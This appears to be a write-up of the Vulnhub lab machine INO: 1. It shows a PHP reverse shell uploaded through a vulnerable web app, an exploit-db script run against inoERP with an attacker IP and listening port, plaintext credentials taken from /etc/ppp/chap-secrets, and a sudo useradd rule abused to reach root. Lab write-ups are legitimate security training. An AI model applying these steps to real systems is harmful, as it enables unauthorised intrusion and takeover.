Introduction

Level: Easy
flags: user, root
Description: This machine require a low skill to get user flag, a little more skill to escalate to root!
Author: foxlox

This is INO: 1 from Vulnhub.

Ports

SSH, SMTP (25) and HTTP.

HTTP

Well, this webserver hated me. Because it’s running fail2ban. Basically it was one run with gobuster or whatever, and then good luck getting it to respond again. Anyway, that was part of the fun I guess :)

The simplest way to a shell here is via /lot/, which is easily found and easily exploited. The exploit doesn’t say what you can do with it, but I uploaded the pentestmonkey PHP reverse shell with the Division List option in the GUI. It was quite happy to take and execute a PHP file, no issues. Yikes.

A quick aside

Google has been flagging the pentestmonkey site as scary and dangerous for a while now, but Chrome flat out refused to download the shell I wanted - there is literally no (obvious) option to tell it that, yes I really do want to download this file. Nope; Google says it’s spooky and you can’t have it.

This wouldn’t have been an issue, except I was working through my Windows host machine rather than Kali, since I’d upset fail2ban on Kali. So I downloaded the file with wget in WSL. Windows Defender promptly nuked it anyway, but at least I had the option to restore it from Defender jail and the nuking didn’t come as a surprise. But Chrome too? Geez.

Back on track

Actually once I’m on the box there is a second web-based option to get a reverse shell. The box is running inoERP in addition to the Lot Reservation Management System. And, inoERP is also exploitable with a python script on searchsploit:

root@kali:/opt/vulnhub/ino# searchsploit -m php/webapps/48946.py
  Exploit: InoERP 0.7.2 - Remote Code Execution (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/48946
     Path: /usr/share/exploitdb/exploits/php/webapps/48946.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /opt/vulnhub/ino/48946.py


root@kali:/opt/vulnhub/ino# chmod +x 48946.py 
root@kali:/opt/vulnhub/ino# python 48946.py 
specify params in format: python inoerp.py target_url attacker_ip listening_port
root@kali:/opt/vulnhub/ino# python 48946.py http://192.168.1.155/ino_enterprise_resource_planning/www/ 192.168.1.150 1235

The only hard part with that would be knowing that the directory exists - ino_enterprise_resource_planning is a heck of a subdirectory name to guess. I haven’t checked if it’s in any of my wordlists but I can’t see why it would be.

On the box

We can find some MySQL creds (lot:lot) and extract a bunch of hashes, many of which we can crack to simple things like admin, admin123 etc. But none of this is useful. I run LinPeas; nothing very useful. We have one obvious target user - ppp. I had to enumerate the box for quite a while before I eventually found the user password; here’s my thinking.

I could see that the box was being worked on during late October - particularly October 27 in the afternoon. I knew I wanted the user ppp. I ran this command:

www-data@ino:/$ find . -ls 2>/dev/null | grep 'Oct 27 18' | cat 2>/dev/null | grep ppp

Which turned up this, amongst some other things:

132449 8 -rw-r–r– 1 root root 4141 Oct 27 18:47 ./var/lib/dpkg/info/ppp.list

I looked in that file, and found there was an /etc/ppp directory, which I hadn’t previously noticed. In there, I found the pot of gold:

<rce_planning/www/modules/sys/form_personalization$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -lash
ls -lash
total 68K
4.0K drwxr-xr-x  7 root dip  4.0K Oct 26 16:26 .
4.0K drwxr-xr-x 96 root root 4.0K Dec  5 01:32 ..
4.0K -rw-r--r--  1 root root  101 Oct 26 16:26 chap-secrets
4.0K -rwxr-xr-x  1 root root 1.8K Feb 20  2020 ip-down
4.0K drwxr-xr-x  2 root root 4.0K Oct 26 16:24 ip-down.d
4.0K -rwxr-xr-x  1 root root 1.9K Feb 20  2020 ip-up
4.0K drwxr-xr-x  2 root root 4.0K Oct 26 16:40 ip-up.d
4.0K -rwxr-xr-x  1 root root  784 Feb 20  2020 ipv6-down
4.0K drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-down.d
4.0K -rwxr-xr-x  1 root root  922 Feb 20  2020 ipv6-up
4.0K drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-up.d
 16K -rw-r--r--  1 root root  13K Feb 20  2020 options
4.0K -rw-------  1 root root 1.6K Oct 26 16:24 pap-secrets
4.0K drwxr-s---  2 root dip  4.0K Oct 26 16:24 peers
www-data@ino:/etc/ppp$ file chap
file chap-secrets 
chap-secrets: ASCII text
www-data@ino:/etc/ppp$ cat ch
cat chap-secrets 
# Secrets for authentication using CHAP
# client        server  secret                  IP addresses
ppp     *       ESRxd7856HVJB   *

So yes, now we have the password for ppp.

Privesc

ppp can run useradd as root. I had to check the manpages, but when we add a user we can add them to a group, and specify their password (as returned by crypt) if we want. So the method I used was to add a user called rootpls with the password mrcake to the sudo group. Then since he was in the sudo group, I could do sudo su to become root. Let’s see this in action:

www-data@ino:/$ su ppp
su ppp
Password: ESRxd7856HVJB

ppp@ino:/$ sudo -l
sudo -l
Matching Defaults entries for ppp on ino:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ppp may run the following commands on ino:
    (root) NOPASSWD: /usr/sbin/useradd *
ppp@ino:/$ 

ppp@ino:/$ sudo -u root /usr/sbin/useradd -g sudo -p WVLY0mgH0RtUI rootpls
sudo -u root /usr/sbin/useradd -g sudo -p WVLY0mgH0RtUI rootpls
ppp@ino:/$ su rootpls
su rootpls
Password: mrcake
$ id
id
uid=1003(rootpls) gid=27(sudo) groups=27(sudo)
$ sudo su
sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for rootpls: mrcake

root@ino:/# 
root@ino:~# cat proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5

Not going to lie, I did a little happy dance once I’d rooted this one :)